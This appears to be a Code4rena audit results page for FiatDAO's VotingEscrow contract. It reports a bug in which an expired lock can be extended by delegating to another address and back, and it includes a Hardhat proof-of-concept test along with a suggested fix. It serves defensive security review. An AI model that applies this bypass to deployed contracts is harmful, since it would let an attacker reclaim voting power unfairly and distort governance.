Platform: Code4rena
Start Date: 12/08/2022
Pot Size: $35,000 USDC
Total HM: 10
Participants: 126
Period: 3 days
Judge: Justin Goro
Total Solo HM: 3
Id: 154
League: ETH
Rank: 9/126
Findings: 2
Award: $571.54
Selected for report: 1
Solo Findings: 0
Selected for report: KIntern_NA
541.6482 USDC - $541.65
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L493-L523
Can not prevent expired locks being extended.
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L493-L523
Call function increaseUnlockTime() with an expired lock (locked[msg.sender].end < block.timestamp).
But in case 1 (sender's lock was not delegated to another), the sender can delegate to a new address with an end time of lock equal to the new end time. After that he can call increaseUnlockTime() and move to case 2. Then the sender can undelegate and the lock will be extended, and the sender will take back vote power.
Here is the script :
```js
// Meant to run inside the project's Hardhat test suite: ve, alice, bob, lockAmount,
// WEEK, provider, createSnapshot and getTimestamp are expected from its test setup.
describe("voting escrow", async () => {
  it("increase unlock time issue", async () => {
    await createSnapshot(provider);
    // alice creates lock
    let lockTime = WEEK + (await getTimestamp());
    await ve.connect(alice).createLock(lockAmount, lockTime);
    // bob creates lock
    lockTime = 50 * WEEK + (await getTimestamp());
    await ve.connect(bob).createLock(10 ** 8, lockTime);
    // pass 1 week, alice's lock is expired
    await ethers.provider.send("evm_mine", [(await getTimestamp()) + WEEK]);
    expect(await ve.balanceOf(alice.address)).to.eq(0);
    // alice can not increase unlock time
    await expect(ve.connect(alice).increaseUnlockTime(lockTime)).to.be.revertedWith("Lock expired");
    // alice delegates to bob, then can increase unlock time
    await ve.connect(alice).delegate(bob.address);
    await expect(ve.connect(alice).increaseUnlockTime(lockTime)).to.not.be.reverted;
    // alice delegates back to herself
    await ve.connect(alice).delegate(alice.address);
    expect(await ve.balanceOf(alice.address)).to.gt(0);
  });
});
```
Manual review
In every case, expired locks should be able to be extended -> should remove line https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L511
#0 - gititGoro
2022-09-03T01:32:48Z
Very good report, especially because of that script.
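The path dependence this finding describes, as an added example that is not part of the original report or the project's code: a simplified in-memory model (an assumption, not VotingEscrow.sol) replays the script's scenario under three expiry-check policies and reports whether the expired lock regains voting power on each path. The names makeEscrow, extendExpired and the "always" policy are hypothetical.

```javascript
// Added example: simplified model of the behaviour the script exercises.
const WEEK = 7 * 24 * 3600;

// policy "original": expiry checked only for undelegated locks (as the script shows)
// policy "remove":   check dropped on every path (the report's recommendation)
// policy "always":   check applied on every path (hypothetical alternative)
function makeEscrow(policy) {
  const locks = new Map(); // address -> { end, delegatee }
  const s = { now: 0 };
  s.createLock = (who, end) => locks.set(who, { end, delegatee: who });
  s.delegate = (who, to) => {
    const from = locks.get(who), target = locks.get(to);
    if (target.end < from.end) throw new Error("Only delegate to longer lock");
    from.delegatee = to;
  };
  s.increaseUnlockTime = (who, newEnd) => {
    const lock = locks.get(who);
    if (newEnd <= lock.end) throw new Error("Only increase lock end");
    const expired = lock.end <= s.now;
    const checked = policy === "always" ||
      (policy === "original" && lock.delegatee === who);
    if (expired && checked) throw new Error("Lock expired");
    lock.end = newEnd;
  };
  // A lock carries its owner's voting power only if undelegated and not expired.
  s.hasPower = (who) => {
    const lock = locks.get(who);
    return lock.delegatee === who && lock.end > s.now;
  };
  return s;
}

// Replays the scenario twice: extending directly, and extending via
// delegate -> extend -> delegate back. True means the expired lock was revived.
function extendExpired(policy) {
  const run = (viaDelegation) => {
    const ve = makeEscrow(policy);
    ve.createLock("alice", WEEK);
    ve.createLock("bob", 50 * WEEK);
    ve.now = WEEK; // alice's lock has expired
    try {
      if (viaDelegation) ve.delegate("alice", "bob");
      ve.increaseUnlockTime("alice", 50 * WEEK);
      if (viaDelegation) ve.delegate("alice", "alice");
    } catch (e) { return false; }
    return ve.hasPower("alice");
  };
  return { direct: run(false), viaDelegation: run(true) };
}
for (const p of ["original", "remove", "always"]) console.log(p, extendExpired(p));
```

Only the "original" policy gives different answers for the two paths; a regression test for the fix can assert that both paths agree.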
Selected for report: oyc_109
Also found by: 0x1f8b, 0x52, 0xDjango, 0xLovesleep, 0xNazgul, 0xNineDec, 0xbepresent, 0xmatt, 0xsolstars, Aymen0909, Bahurum, Bnke0x0, CertoraInc, Chom, CodingNameKiki, DecorativePineapple, Deivitto, Dravee, ElKu, Funen, GalloDaSballo, IllIllI, JC, JohnSmith, Junnon, KIntern_NA, Lambda, LeoS, MiloTruck, Noah3o6, PaludoX0, RedOneN, Respx, ReyAdmirado, Rohan16, RoiEvenHaim, Rolezn, Ruhum, Sm4rty, TomJ, Vexjon, Waze, Yiko, __141345__, a12jmx, ajtra, ak1, apostle0x01, asutorufos, auditor0517, bin2chen, bobirichman, brgltd, bulej93, byndooa, c3phas, cRat1st0s, cryptphi, csanuragjain, d3e4, defsec, delfin454000, djxploit, durianSausage, ellahi, erictee, exd0tpy, fatherOfBlocks, gogo, jonatascm, ladboy233, medikko, mics, natzuu, neumo, p_crypt0, paribus, pfapostol, rbserver, reassor, ret2basic, robee, rokinot, rvierdiiev, sach1r0, saneryee, seyni, sikorico, simon135, sseefried, wagmi, wastewa
29.8918 USDC - $29.89
https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L414
This comment makes readers misunderstand, because after using quitLock(), users must create a new lock with function createLock(). If users use increaseAmount, it will be reverted: https://github.com/code-423n4/2022-08-fiatdao/blob/main/contracts/VotingEscrow.sol#L449
Should use SafeCast.toInt128(int256()) instead of int128(int256())